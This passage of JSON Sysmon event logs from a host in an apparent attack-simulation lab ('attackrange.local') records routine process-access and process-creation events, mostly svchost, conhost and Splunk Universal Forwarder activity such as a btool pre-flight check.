05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3346,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3347,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3348,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3349,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3350,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3351,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-001040370500}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-001040370500}","TargetProcessId":"4564","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3352,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.981\r\nSourceProcessGUID: {A837DB8D-023A-5F25-0000-001040370500}\r\nSourceProcessId: 4564\r\nSourceThreadId: 4560\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.981","SourceProcessGUID":"{A837DB8D-023A-5F25-0000-001040370500}","SourceProcessId":"4564","SourceThreadId":"4560","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3353,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.065\r\nProcessGuid: {A837DB8D-023B-5F25-0000-0010623B0500}\r\nProcessId: 4528\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-023A-5F25-0000-001019300500}\r\nParentProcessId: 4368\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.065","ProcessGuid":"{A837DB8D-023B-5F25-0000-0010623B0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-023A-5F25-0000-001019300500}","ParentProcessId":"4368","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3354,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-023A-5F25-0000-001019300500}\r\nSourceProcessId: 4368\r\nSourceThreadId: 3288\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-0010623B0500}\r\nTargetProcessId: 4528\r\nTargetImage: 